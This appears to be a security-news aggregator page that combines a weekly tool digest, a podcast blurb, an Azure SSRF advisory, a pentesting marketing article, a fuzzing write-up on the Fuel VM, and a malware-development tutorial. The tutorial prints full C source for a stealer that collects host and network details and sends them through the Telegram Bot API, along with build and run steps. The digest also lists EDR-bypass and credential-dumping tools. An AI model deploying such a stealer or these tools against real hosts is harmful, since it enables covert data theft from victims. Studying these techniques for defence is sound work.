Normal view

There are new articles available, click to refresh the page.
Today — 18 June 2024Main stream

Last Week in Security (LWiS) - 2024-06-17

By: Erik
18 June 2024 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the past week. This post covers 2024-06-10 to 2024-06-17.

News

Techniques and Write-ups

Tools and Exploits

  • Voidgate - A technique that can be used to bypass AV/EDR memory scanners. This can be used to hide well-known and detected shellcodes (such as msfvenom) by performing on-the-fly decryption of individual encrypted assembly instructions, thus rendering memory scanners useless for that specific memory page.
  • Hunt-Sleeping-Beacons - Aims to identify sleeping beacons.
  • Invoke-ADEnum - Automate Active Directory Enumeration.
  • QRucible - Python utility that generates "imageless" QR codes in various formats.
  • RdpStrike - Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP.
  • Deobfuscar - A simple commandline application to automatically decrypt strings from Obfuscator protected binaries.
  • gcpwn - Enumeration/exploit/analysis/download/etc pentesting framework for GCP; modeled like Pacu for AWS; a product of numerous hours via @WebbinRoot.
  • honeyzure - HoneyZure is a honeypot tool specifically designed for Azure environments, fully provisioned through Terraform. It leverages a Log Analytics Workspace to ingest logs from various Azure resources, generating alerts whenever the deceptive Azure resources are accessed.
  • SteppingStones - A Red Team Activity Hub.
  • CVE-2024-26229 - CWE-781: Improper Address Validation in IOCTL with METHOD_NEITHER I/O Control Code.
  • CVE-2024-26229-BOF - BOF implementations of CVE-2024-26229 for Cobalt Strike and BruteRatel.
  • profiler-lateral-movement - Lateral Movement via the .NET Profiler.
  • SlackEnum - A user enumeration tool for Slack.
  • ScriptBlock-Smuggling - Example code samples from our ScriptBlock Smuggling Blog post.
  • NativeDump - Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!).

New to Me and Miscellaneous

This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!

  • nowafpls - Burp Plugin to Bypass WAFs through the insertion of Junk Data.
  • lazyegg - LazyEgg is a powerful tool for extracting various types of data from a target URL. It can extract links, images, cookies, forms, JavaScript URLs, localStorage, Host, IP, and leaked credentials.
  • KeyCluCask - Simple and handy overview of applications shortcuts.
  • security-hub-compliance-analyzer - A compliance analysis tool which enables organizations to more quickly articulate their compliance posture and also generate supporting evidence artifacts.
  • Nemesis-Ansible - Automatically deploy Nemesis.
  • Packer_Development - Slides & Code snippets for a workshop held @ x33fcon 2024.
  • InsightEngineering - Hardcore Debugging.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing.

Yesterday — 17 June 2024Main stream

Roku’s hacked data breach – will we never learn our lesson? | Guest Zarik Megerdichian

By: Infosec
17 June 2024 at 18:00

Zarik Megerdichian, the co-founder of personal privacy controller company Loop8, joins me in breaking down the recent Roku breach, which landed hackers a whopping 15,000 users' worth of vital data. Megerdichian and I discuss the failings of the current data collection and storage model while moving to a model in which biometrics is the primary identification method, coupled with a system of contacts who can vouch for you in the event that your device is lost or stolen. It’s another interesting approach to privacy and online identity in the age of the never-ending breach announcement parade.

– Get your FREE cybersecurity training resources: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Roku's data breach
1:54 - First, getting into computers
5:45 - Megerdichian's company goals
9:29 - What happened during the Roku data breach?
11:20 - The state of data collection
14:16 - Uneccesary online data collection
16:26 - Best data storage protection
17:56 - A change in data collection
20:49 - What does Loop8 do?
24:09 - Deincetivizing hackers
25:21 - Biometric account recovery
30:09 - How to work in the biometric data field
33:10 - Challenges of biometric data recovery work
34:46 - Skills gaps in biometric data field
36:59 - Megerdichian's favorite part of the work day
37:46 - Importance of cybersecurity mentorship
41:03 - Best cybersecurity career advice
43:33 - Learn more about Loop8 and Megerdichian
44:34 - Outro

About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.

💾

Mitigating SSRF Vulnerabilities Impacting Azure Machine Learning

Summary On May 9, 2024, Microsoft successfully addressed multiple vulnerabilities within the Azure Machine Learning (AML) service, which were initially discovered by security research firms Wiz and Tenable. These vulnerabilities, which included Server-Side Request Forgeries (SSRF) and a path traversal vulnerability, posed potential risks for information exposure and service disruption via Denial-of-Service (DOS).

Enhancing Vulnerability Management: Integrating Autonomous Penetration Testing

17 June 2024 at 15:53

Revolutionizing Cybersecurity with NodeZero™ for Comprehensive Risk Assessment and Prioritization

Traditional vulnerability scanning tools have been essential for identifying systems running software with known vulnerabilities. These tools form the foundation of many Vulnerability Management (VM) programs and have long been used to conduct vulnerability assessments. However, despite their widespread use, these tools face limitations because not all vulnerabilities they flag are exploitable without specific conditions being met.

For instance, the National Vulnerability Database (NVD) Dashboard, managed by the National Institute of Standards and Technology (NIST), currently tracks over 253,000 entries, with new software vulnerabilities being added daily. The primary challenge lies in determining how many of these vulnerabilities have known exploits, are actively being exploited in the wild, or are even exploitable within a specific environment. Organizations continuously struggle with this uncertainty, which complicates the assessment and prioritization of vulnerabilities.

To help address this issue, the Cybersecurity and Infrastructure Security Agency (CISA) initiated the Known Exploited Vulnerabilities (KEV) Catalog in 2021. This catalog aims to help the industry track and mitigate vulnerabilities known to be widely exploited. As of now, the CISA KEV Catalog contains 1120 entries. Prior to this initiative, there was no comprehensive record of Common Vulnerabilities and Exposures (CVEs) that were successfully exploited in the wild. This gap highlights the challenge of relying solely on vulnerability scanning tools for measuring and quantifying risk, underscoring the need for more context-aware approaches in vulnerability management.

The Challenge of Prioritizing “Exploitable” Vulnerabilities

Organizations purchase vulnerability scanning tools to identify systems running known vulnerable software. However, without effective prioritization based on exploitability, they are often left uncertain about where to focus their remediation efforts. Prioritization of exploitability is crucial for effective VM initiatives, enabling organizations to address the most critical vulnerabilities first.

For example, Art Ocain, Airiam’s CISO & Incident Response Product Management Lead, noted that many available vulnerability scanning tools were basic and time-consuming. These tools scanned client environments, then compared results with a vulnerability list, and flagged discrepancies without providing the necessary detail and nuance. This approach failed to convince clients to act quickly and did not empower them to prioritize fixing the most critical issues. The challenge of not knowing if a vulnerability is exploitable is widely acknowledged within the industry.

Jim Beers, Director of Information Security at Moravian University tends to agree. He mentions that traditional vulnerability scanners are good at identifying and describing vulnerabilities in general, but often fall short in providing actionable guidance.

“Our past vulnerability scanner told me what vulnerabilities were of high or low severity and if there is an exploit, but it didn’t tell me why…there was too much information without enough direction or actionable insights.”

Combining Vulnerability Scanning and Autonomous Pentesting

To address the challenge of prioritizing exploitability, vulnerability scanning efforts that primarily detect known vulnerabilities are now being enhanced by integrating the NodeZero autonomous penetration testing platform into VM programs. This combined approach is revolutionizing VM processes, offering significant advantages.

Calvin Engen, CTO at F12.net agrees: “The value that you get by doing this activity, and by leveraging NodeZero, is achieving far more visibility into your environment than you ever had before. And through that visibility, you can really break down the items that are most exploitable and solve for those.”

NodeZero‘s Advantages Over Traditional Scanning Tools

NodeZero surpasses the limitations of traditional scanning tools that primarily scan an environment using a list of known CVEs. Traditional scanners are proficient in detecting well-documented vulnerabilities of the services, systems, and applications in use, but they often miss the nuanced security issues that are prevalent.

NodeZero fills this gap by going beyond known and patchable vulnerabilities, such as easily compromised credentials, exposed data, misconfigurations, poor security controls, and weak policies – subtleties that can be just as detrimental as well-known vulnerabilities. Additionally, NodeZero enables organizations to look at their environment as an attacker would, illuminating their exploitable attack surface and vectors. By integrating autonomous pentesting into VM programs, organizations benefit from a more comprehensive view of their security posture, arming them with the insights needed to thwart not only the common threats but also the hidden ones that could slip under the radar of conventional VM programs.

As Jon Isaacson, Principal Consultant at JTI Cybersecurity explains, “without taking an attackers perspective by considering actual attack vectors that they can use to get in, you really can’t be ready.”

Exploitability Analysis

Understanding the difference between known vulnerabilities and exploitable vulnerabilities, measuring exploitability is key to risk reduction. NodeZero excels at validating and proving whether a vulnerability is, in fact, exploitable, and what impact its exploitation can lead to. This capability of autonomous penetration testing is crucial because it empowers security teams to strategize their remediation efforts, focusing on vulnerabilities that could be actively exploited by attackers, thus enhancing the effectiveness of VM programs overall.

Risk Prioritization

Another area where traditional vulnerability scanning approaches fall short is risk prioritization. Often, detected vulnerabilities are assigned a broad risk level without considering the specific context of how the software or application is being used within the organization. NodeZero diverges from this path by evaluating the potential downstream impacts of a vulnerability being exploited by highlighting what can happen next. This context-based prioritization of risks directs attention and resources to the vulnerabilities that could lead to severe consequences for an organization’s operations and compromise the integrity of its security efforts. By doing so, NodeZero ensures that the most critical vulnerabilities are identified as a priority for remediation efforts.

Cross-Host Vulnerability Chaining

NodeZero organically executes complex attack scenarios by chaining vulnerabilities and weaknesses across different hosts. This reveals how attackers could exploit multiple, seemingly insignificant vulnerabilities in conjunction to orchestrate a sophisticated attack, potentially compromising other critical systems or accessing sensitive information that may otherwise be inaccessible. This capability of chaining vulnerabilities across hosts is indispensable for understanding the available attack paths attackers could capitalize on. Through this approach, organizations gain insight into how an attacker will navigate through their network, piecing together a path of least resistance and escalating privileges to reach critical assets.

Integration and Automation with NodeZero API

Upon completing a NodeZero penetration test, the NodeZero API allows for the extraction and integration of test results into existing VM workflows. This means that organizations can automatically import detailed exploitation results into their vulnerability management reporting systems. The seamless integration of NodeZero with VM processes enables organizations to accurately classify and prioritize security weaknesses based on real-world exploitability and potential impacts. By focusing on remediating the most exploitable security weaknesses, organizations are not just patching vulnerabilities; they are strategically enhancing their defenses against the threats that matter most.

Conclusion

The integration of autonomous penetration testing into Vulnerability Management (VM) programs marks a significant revolution in the field of cybersecurity. While traditional vulnerability scanning tools are indispensable for identifying systems potentially running known vulnerable software, they fall short in prioritizing vulnerabilities based on exploitability. This gap leaves organizations uncertain about where to focus their remediation efforts, a challenge that has become more pronounced with the increasing complexity and prevalence of nuanced security issues.

NodeZero addresses these limitations by combining the strengths of traditional scanning with the advanced capabilities of autonomous penetration testing. This integration enhances VM programs by providing a more comprehensive view of an organization’s security posture. NodeZero excels in exploitability analysis, risk prioritization, and cross-host vulnerability chaining, offering insights into both common and hidden threats. Furthermore, the seamless integration of NodeZero within existing VM workflows through its API allows for accurate classification and prioritization of security weaknesses based on real-world exploitability and potential impacts.

By focusing remediation efforts on the most critical vulnerabilities while looking at their attack surface through the eyes of an attacker, organizations can strategically enhance their defenses against the threats that matter most, in less time, and with more return on effort. This combined approach not only improves the effectiveness of VM programs but also empowers security teams to proactively manage and mitigate risks in a dynamic threat landscape. The revolution of integrating autonomous penetration testing into VM programs is a transformative step towards more robust and resilient cybersecurity practices.

Download the PDF

The post Enhancing Vulnerability Management: Integrating Autonomous Penetration Testing appeared first on Horizon3.ai.

Finding mispriced opcodes with fuzzing

17 June 2024 at 13:00

By Max Ammann

Fuzzing—a testing technique that tries to find bugs by repeatedly executing test cases and mutating them—has traditionally been used to detect segmentation faults, buffer overflows, and other memory corruption vulnerabilities that are detectable through crashes. But it has additional uses you may not know about: given the right invariants, we can use it to find runtime errors and logical issues.

This blog post explains how Trail of Bits developed a fuzzing harness for Fuel Labs and used it to identify opcodes that charge too little gas in the Fuel VM, the platform on which Fuel smart contracts run. By implementing a similar fuzzing setup with carefully chosen invariants, you can catch crucial bugs in your smart contract platform.

How we developed a fuzzing harness and seed corpus

The Fuel VM had an existing fuzzer that used cargo-fuzz and libFuzzer. However, it had several downsides. First, it did not call internal contracts. Second, it was somewhat slow (~50 exec/s). Third, it used the arbitrary crate to generate random programs consisting of just vectors of Instructions.

We developed a fuzzing harness that allows the fuzzer to execute scripts that call internal contracts. The harness still uses cargo-fuzz to execute. However, we replaced libFuzzer with a shim provided by the LibAFL project. The LibAFL runtime allows executing test cases on multiple cores and increases the fuzzing performance to ~1,000 exec/s on an eight-core machine.

After analyzing the output of the Sway compiler, we noticed that plain data is interleaved with actual instructions in the compiler’s output. Thus, simple vectors of instructions do not accurately represent the output of the Sway compiler. But even worse, Sway compiler output could not be used as a seed corpus.

To address these issues, the fuzzer input had to be redesigned. The input to the fuzzer is now a byte vector that contains the script assembly, script data, and the assembly of a contract to be called. Each of these is separated by an arbitrarily chosen, 64-bit magic value (0x00ADBEEF5566CEAA). Because of this redesign, compiled Sway programs can be used as input to the seed corpus (i.e., as initial test cases). We used the examples from the Sway repository as initial input to speed up the fuzzing campaign.

The LibAFL-based fuzzer is implemented as a Rust binary with subcommands for generating seeds, executing test cases in isolation, collecting gas usage statistics of test cases, and actually executing the fuzzer. Its README includes instructions for running it. The source code for the fuzzer can be found in FuelLabs/fuel-vm#724.

Challenges encountered

During our audit, we had to overcome a number of challenges. These included the following:

  • The secp256k1 0.27.0 dependency is currently incompatible with cargo-fuzz because it enables a special fuzzing mode automatically that breaks secp256k1’s functionality. We applied the following dependency declaration in fuel-crypto/Cargo.toml:20:

    Figure 1: Updated dependency declaration

  • The LibAFL shim is not stable and is not yet part of any release. As a result, bugs are expected, but due to the performance improvements, it is still worthwhile to consider using it over the default fuzzer runtime.
  • We were looking for a way to pass in the offset to the script data to the program that is executed in the fuzzer. We decided to do this by patching the fuel-vm. The fuel-vm writes the offset into the register 0x10 before executing the actual program. That way, programs can reliably access the script data offset. Also, seed inputs continue to execute as expected. The following change was necessary in fuel-vm/src/interpreter/executors/main.rs:523:

    Figure 2: Write the script data offset to register 0x10

Additionally, we added the following test case to the seed corpus that uses this behavior.

Figure 3: Test case for using the now-available script data offset

Using fuzzing to analyze gas usage

The corpus created by a fuzzing campaign can be used to analyze the gas usage of assembly programs. It is expected that gas usage strongly correlates with execution time (note that execution time is a proxy for the amount of CPU cycles spent).

Our analysis of the Fuel VM’s gas usage consists of three steps:

  1. Launch a fuzzing campaign.
  2. Execute cargo run --bin collect <file/dir> on the corpus, which yields a gas_statistics.csv file.
    • Examine and plot the result of the gathered data using the Python script from figure 4.
  3. Identify the outliers and execute the test cases in the corpus. During the execution, gather data about which instructions are executed and for how long.
    • Examine the collected data by grouping it by instruction and reducing it to a table which shows which instructions cause high execution times.

This section describes each step in more detail.

Step 1: Fuzz

The cargo-fuzz tool will output the corpus in the directory corpus/grammar_aware. The fuzzer tries to find inputs that increase the coverage. Furthermore, the LibAFL fuzzer prefers short inputs that yield a long execution time. This goal is interesting because it could uncover operations that do not consume very much gas but spend a long time executing.

Step 2: Collect data and evaluate

The Python script in figure 4 loads the CSV file created by invoking cargo run --bin collect <file/dir>. It then plots the execution time vs. gas consumption. This already reveals that there are some outliers that take longer to execute than other test cases while using the same amount of gas.

Figure 4: Python script to determine gas usage vs execution time of the discovered test inputs

Figure 5: Results of running the script in figure 4

Step 3: Identify and analyze outliers

The Python script in figure 6 performs a linear regression through the data. Then, we determine which test cases are more than 1,000ms off from the regression and store them in the inspect variable. The results appear in figure 7.

Figure 6: Python script to perform linear regression over the test data

Figure 7: Results of running the script in figure 6

Finally, we re-execute the corpus with specific changes applied to gather data about which executions are responsible for the long execution. The changes are the following:

  • Add let start = Instant::now(); at the beginning of function instruction_inner.
  • Add println!("{:?}\t{:?}", instruction.opcode(), start.elapsed().as_nanos()); at the end of the function.

These changes cause the execution of a test case to print out the opcode and the execution time of each instruction.

Figure 8: Investigation of the contribution to execution time for each instruction

The outputs for Fuel’s opcodes are shown below:

Figure 9: Results of running the script in figure 8

The above evaluation shows that the opcodes MCLI, SCWQ, K256, SWWQ, and SRWQ may be mispriced. For SCWQ, SWWQ, and K256, the results were expected because we already discovered problematic behavior through fuzzing. Each of these issues appears to be resolved (see FuelLabs/fuel-vm#537). This analysis also shows that there might be a pricing issue for SRWQ. We are unsure why MCLI shows in our analysis. This may be due to noise in our data, as we could not find an immediate issue with its implementation and pricing.

Lessons learned

As the project evolves, it is essential that the Fuel team continues running a fuzzing campaign on code that introduces new functionality, or on functions that handle untrusted data. We suggested the following to the Fuel team:

  • Run the fuzzer for at least 72 hours (or ideally, a week). While there is currently no tooling to determine ideal execution time, the coverage data gives a good estimate about when to stop fuzzing. We saw no more valuable progress of the fuzzer after executing it more than 72 hours.
  • Pause the fuzzing campaign whenever new issues are found. Developers should triage them, fix them, and then resume the fuzzing. This will reduce the effort needed during triage and issue deduplication.
  • Fuzz test major releases of the Fuel VM, particularly after major changes. Fuzz testing should be integrated as part of the development process, and should not be conducted only once in a while.

Once the fuzzing procedure has been tuned to be fast and efficient, it should be properly integrated in the development cycle to catch bugs. We recommend the following procedure to integrate fuzzing using a CI system, for instance by using ClusterFuzzLite (see FuelLabs/fuel-vm#727):

  1. After the initial fuzzing campaign, save the corpus generated by every test.
  2. For every internal milestone, new feature, or public release, re-run the fuzzing campaign for at least 24 hours starting with each test’s current corpus.1
  3. Update the corpus with the new inputs generated.

Note that, over time, the corpus will come to represent thousands of CPU hours of refinement, and will be very valuable for guiding efficient code coverage during fuzz testing. An attacker could also use a corpus to quickly identify vulnerable code; this additional risk can be avoided by keeping fuzzing corpora in an access-controlled storage location rather than a public repository. Some CI systems allow maintainers to keep a cache to accelerate building and testing. The corpora could be included in such a cache, if they are not very large.

Future work

In the future, we recommended that Fuel expand the assertions used in the fuzzing harness, especially for the execution of blocks. For example, the assertions found in unit tests could serve as an inspiration for implementing additional checks that are evaluated during fuzzing.

Additionally, we encountered an issue with the required alignment of programs. Programs for the Fuel VM must be 32-bit aligned. The current fuzzer does not honor this alignment, and thus easily produces invalid programs, e.g., by inserting only one byte instead of four. This can be solved in the future by either using a grammar-based approach or adding custom mutations that honor the alignment.

Instead of performing the fuzzing in-house, one could use the oss-fuzz project, which performs automatic fuzzing campaigns with Google’s extensive testing infrastructure. oss-fuzz is free for widely used open-source software. We believe they would accept Fuel as another project.

On the plus side, Google provides all their infrastructure for free, and will notify project maintainers any time a change in the source code introduces a new issue. The received reports include essential important information such as minimized test cases and backtraces.

However, there are some downsides: If oss-fuzz discovers critical issues, Google employees will be the first to know, even before the Fuel project’s own developers. Google policy also requires the bug report to be made public after 90 days, which may or may not be in the best interests of Fuel. Weigh these benefits and risks when deciding whether to request Google’s free fuzzing resources.

If Trail of Bits can help you with fuzzing, please reach out!

1 For more on fuzz-driven development, see this CppCon 2017 talk by Kostya Serebryany of Google.

Malware development trick 40: Stealing data via legit Telegram API. Simple C example.

16 June 2024 at 02:00

Hello, cybersecurity enthusiasts and white hackers!

malware

In one of my last presentations at the conference BSides Prishtina, the audience asked how attackers use legitimate services to manage viruses (C2) or steal data from the victim’s host.

This post is just showing simple Proof of Concept of using Telegram Bot API for stealing information from Windows host.

practical example

Let’s imagine that we want to create a simple stealer that will send us data about the victim’s host. Something simple like systeminfo and adapter info:

char systemInfo[4096];

// get host name
CHAR hostName[MAX_COMPUTERNAME_LENGTH + 1];
DWORD size = sizeof(hostName) / sizeof(hostName[0]);
GetComputerNameA(hostName, &size);  // Use GetComputerNameA for CHAR

// get OS version
OSVERSIONINFO osVersion;
osVersion.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx(&osVersion);

// get system information
SYSTEM_INFO sysInfo;
GetSystemInfo(&sysInfo);

// get logical drive information
DWORD drives = GetLogicalDrives();

// get IP address
IP_ADAPTER_INFO adapterInfo[16];  // Assuming there are no more than 16 adapters
DWORD adapterInfoSize = sizeof(adapterInfo);
if (GetAdaptersInfo(adapterInfo, &adapterInfoSize) != ERROR_SUCCESS) {
printf("GetAdaptersInfo failed. error: %d has occurred.\n", GetLastError());
return false;
}

snprintf(systemInfo, sizeof(systemInfo),
  "Host Name: %s\n"  // Use %s for CHAR
  "OS Version: %d.%d.%d\n"
  "Processor Architecture: %d\n"
  "Number of Processors: %d\n"
  "Logical Drives: %X\n",
  hostName,
  osVersion.dwMajorVersion, osVersion.dwMinorVersion, osVersion.dwBuildNumber,
  sysInfo.wProcessorArchitecture,
  sysInfo.dwNumberOfProcessors,
  drives);

// Add IP address information
for (PIP_ADAPTER_INFO adapter = adapterInfo; adapter != NULL; adapter = adapter->Next) {
snprintf(systemInfo + strlen(systemInfo), sizeof(systemInfo) - strlen(systemInfo),
  "Adapter Name: %s\n"
  "IP Address: %s\n"
  "Subnet Mask: %s\n"
  "MAC Address: %02X-%02X-%02X-%02X-%02X-%02X\n",
  adapter->AdapterName,
  adapter->IpAddressList.IpAddress.String,
  adapter->IpAddressList.IpMask.String,
  adapter->Address[0], adapter->Address[1], adapter->Address[2],
  adapter->Address[3], adapter->Address[4], adapter->Address[5]);
}

But, if we send such information to some IP address it will seem strange and suspicious.
What if instead you create a telegram bot and send information using it to us?

First of all, create simple telegram bot:

malware

As you can see, we can use HTTP API for conversation with this bot.

At the next step install telegram library for python:

python3 -m pip install python-telegram-bot

malware

Then, I slightly modified a simple script: echo bot - mybot.py:

#!/usr/bin/env python
# pylint: disable=unused-argument
# This program is dedicated to the public domain under the CC0 license.

"""
Simple Bot to reply to Telegram messages.

First, a few handler functions are defined. Then, those functions are passed to
the Application and registered at their respective places.
Then, the bot is started and runs until we press Ctrl-C on the command line.

Usage:
Basic Echobot example, repeats messages.
Press Ctrl-C on the command line or send a signal to the process to stop the
bot.
"""

import logging

from telegram import ForceReply, Update
from telegram.ext import Application, CommandHandler, ContextTypes, MessageHandler, filters

# Enable logging
logging.basicConfig(
    format="%(asctime)s - %(name)s - %(levelname)s - %(message)s", level=logging.INFO
)
# set higher logging level for httpx to avoid all GET and POST requests being logged
logging.getLogger("httpx").setLevel(logging.WARNING)

logger = logging.getLogger(__name__)

# Define a few command handlers. These usually take the two arguments update and
# context.
async def start(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:
    """Send a message when the command /start is issued."""
    user = update.effective_user
    await update.message.reply_html(
        rf"Hi {user.mention_html()}!",
        reply_markup=ForceReply(selective=True),
    )

async def help_command(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:
    """Send a message when the command /help is issued."""
    await update.message.reply_text("Help!")

async def echo(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:
    """Echo the user message."""
    print(update.message.chat_id)
    await update.message.reply_text(update.message.text)

def main() -> None:
    """Start the bot."""
    # Create the Application and pass it your bot's token.
    application = Application.builder().token("my token here").build()

    # on different commands - answer in Telegram
    application.add_handler(CommandHandler("start", start))
    application.add_handler(CommandHandler("help", help_command))

    # on non command i.e message - echo the message on Telegram
    application.add_handler(MessageHandler(filters.TEXT & ~filters.COMMAND, echo))

    # Run the bot until the user presses Ctrl-C
    application.run_polling(allowed_updates=Update.ALL_TYPES)


if __name__ == "__main__":
    main()

As you can see, I added printing chat ID logic:

async def echo(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:
    """Echo the user message."""
    print(update.message.chat_id)
    await update.message.reply_text(update.message.text)

Let’s check this simple logic:

python3 mybot.py

malware

malware

malware

As you can see, chat ID successfully printed.

For sending via Telegram Bot API I just created this simple function:

// send data to Telegram channel using winhttp
int sendToTgBot(const char* message) {
  const char* chatId = "466662506";
  HINTERNET hSession = NULL;
  HINTERNET hConnect = NULL;

  hSession = WinHttpOpen(L"UserAgent", WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
  if (hSession == NULL) {
    fprintf(stderr, "WinHttpOpen. Error: %d has occurred.\n", GetLastError());
    return 1;
  }

  hConnect = WinHttpConnect(hSession, L"api.telegram.org", INTERNET_DEFAULT_HTTPS_PORT, 0);
  if (hConnect == NULL) {
    fprintf(stderr, "WinHttpConnect. error: %d has occurred.\n", GetLastError());
    WinHttpCloseHandle(hSession);
  }

  HINTERNET hRequest = WinHttpOpenRequest(hConnect, L"POST", L"/bot---xxxxxxxxYOUR_TOKEN_HERExxxxxx---/sendMessage", NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, WINHTTP_FLAG_SECURE);
  if (hRequest == NULL) {
    fprintf(stderr, "WinHttpOpenRequest. error: %d has occurred.\n", GetLastError());
    WinHttpCloseHandle(hConnect);
    WinHttpCloseHandle(hSession);
  }

  // construct the request body
  char requestBody[512];
  sprintf(requestBody, "chat_id=%s&text=%s", chatId, message);

  // set the headers
  if (!WinHttpSendRequest(hRequest, L"Content-Type: application/x-www-form-urlencoded\r\n", -1, requestBody, strlen(requestBody), strlen(requestBody), 0)) {
    fprintf(stderr, "WinHttpSendRequest. Error %d has occurred.\n", GetLastError());
    WinHttpCloseHandle(hRequest);
    WinHttpCloseHandle(hConnect);
    WinHttpCloseHandle(hSession);
    return 1;
  }

  WinHttpCloseHandle(hConnect);
  WinHttpCloseHandle(hRequest);
  WinHttpCloseHandle(hSession);

  printf("successfully sent to tg bot :)\n");
  return 0;
}

So the full source code is looks like this - hack.c:

/*
 * hack.c
 * sending victim's systeminfo via 
 * legit URL: Telegram Bot API
 * author @cocomelonc
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <winhttp.h>
#include <iphlpapi.h>

// send data to Telegram channel using winhttp
int sendToTgBot(const char* message) {
  const char* chatId = "466662506";
  HINTERNET hSession = NULL;
  HINTERNET hConnect = NULL;

  hSession = WinHttpOpen(L"UserAgent", WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
  if (hSession == NULL) {
    fprintf(stderr, "WinHttpOpen. Error: %d has occurred.\n", GetLastError());
    return 1;
  }

  hConnect = WinHttpConnect(hSession, L"api.telegram.org", INTERNET_DEFAULT_HTTPS_PORT, 0);
  if (hConnect == NULL) {
    fprintf(stderr, "WinHttpConnect. error: %d has occurred.\n", GetLastError());
    WinHttpCloseHandle(hSession);
  }

  HINTERNET hRequest = WinHttpOpenRequest(hConnect, L"POST", L"/bot----TOKEN----/sendMessage", NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, WINHTTP_FLAG_SECURE);
  if (hRequest == NULL) {
    fprintf(stderr, "WinHttpOpenRequest. error: %d has occurred.\n", GetLastError());
    WinHttpCloseHandle(hConnect);
    WinHttpCloseHandle(hSession);
  }

  // construct the request body
  char requestBody[512];
  sprintf(requestBody, "chat_id=%s&text=%s", chatId, message);

  // set the headers
  if (!WinHttpSendRequest(hRequest, L"Content-Type: application/x-www-form-urlencoded\r\n", -1, requestBody, strlen(requestBody), strlen(requestBody), 0)) {
    fprintf(stderr, "WinHttpSendRequest. Error %d has occurred.\n", GetLastError());
    WinHttpCloseHandle(hRequest);
    WinHttpCloseHandle(hConnect);
    WinHttpCloseHandle(hSession);
    return 1;
  }

  WinHttpCloseHandle(hConnect);
  WinHttpCloseHandle(hRequest);
  WinHttpCloseHandle(hSession);

  printf("successfully sent to tg bot :)\n");
  return 0;
}

// get systeminfo and send to chat via tgbot logic
int main(int argc, char* argv[]) {

  // test tgbot sending message
  char test[1024];
  const char* message = "meow-meow";
  snprintf(test, sizeof(test), "{\"text\":\"%s\"}", message);
  sendToTgBot(test);

  char systemInfo[4096];

  // Get host name
  CHAR hostName[MAX_COMPUTERNAME_LENGTH + 1];
  DWORD size = sizeof(hostName) / sizeof(hostName[0]);
  GetComputerNameA(hostName, &size);  // Use GetComputerNameA for CHAR

  // Get OS version
  OSVERSIONINFO osVersion;
  osVersion.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
  GetVersionEx(&osVersion);

  // Get system information
  SYSTEM_INFO sysInfo;
  GetSystemInfo(&sysInfo);

  // Get logical drive information
  DWORD drives = GetLogicalDrives();

  // Get IP address
  IP_ADAPTER_INFO adapterInfo[16];  // Assuming there are no more than 16 adapters
  DWORD adapterInfoSize = sizeof(adapterInfo);
  if (GetAdaptersInfo(adapterInfo, &adapterInfoSize) != ERROR_SUCCESS) {
    printf("GetAdaptersInfo failed. error: %d has occurred.\n", GetLastError());
    return false;
  }

  snprintf(systemInfo, sizeof(systemInfo),
    "Host Name: %s\n"  // Use %s for CHAR
    "OS Version: %d.%d.%d\n"
    "Processor Architecture: %d\n"
    "Number of Processors: %d\n"
    "Logical Drives: %X\n",
    hostName,
    osVersion.dwMajorVersion, osVersion.dwMinorVersion, osVersion.dwBuildNumber,
    sysInfo.wProcessorArchitecture,
    sysInfo.dwNumberOfProcessors,
    drives);

  // Add IP address information
  for (PIP_ADAPTER_INFO adapter = adapterInfo; adapter != NULL; adapter = adapter->Next) {
    snprintf(systemInfo + strlen(systemInfo), sizeof(systemInfo) - strlen(systemInfo),
    "Adapter Name: %s\n"
    "IP Address: %s\n"
    "Subnet Mask: %s\n"
    "MAC Address: %02X-%02X-%02X-%02X-%02X-%02X\n\n",
    adapter->AdapterName,
    adapter->IpAddressList.IpAddress.String,
    adapter->IpAddressList.IpMask.String,
    adapter->Address[0], adapter->Address[1], adapter->Address[2],
    adapter->Address[3], adapter->Address[4], adapter->Address[5]);
  }
  
  char info[8196];
  snprintf(info, sizeof(info), "{\"text\":\"%s\"}", systemInfo);
  int result = sendToTgBot(info);

  if (result == 0) {
    printf("ok =^..^=\n");
  } else {
    printf("nok <3()~\n");
  }

  return 0;
}

demo

Let’s check everything in action.

Compile our “stealer” hack.c:

x86_64-w64-mingw32-g++ -O2 hack.c -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive -liphlpapi -lwinhttp

malware

And run it on my Windows 11 VM:

.\hack.exe

malware

If we check traffic via Wireshark we got IP address 149.154.167.220:

whois 149.154.167.220

malware

As you can see, everything is worked perfectly =^..^=!

Scanning via WebSec Malware Scanner:

malware

https://websec.nl/en/scanner/result/45dfcb29-3817-4199-a6ef-da00675c6c32

Interesting result.

Of course, this is not such a complex stealer, because it’s just “dirty PoC” and in real attacks stealers with more sophisticated logic are used, but I think I was able to show the essence and risks.

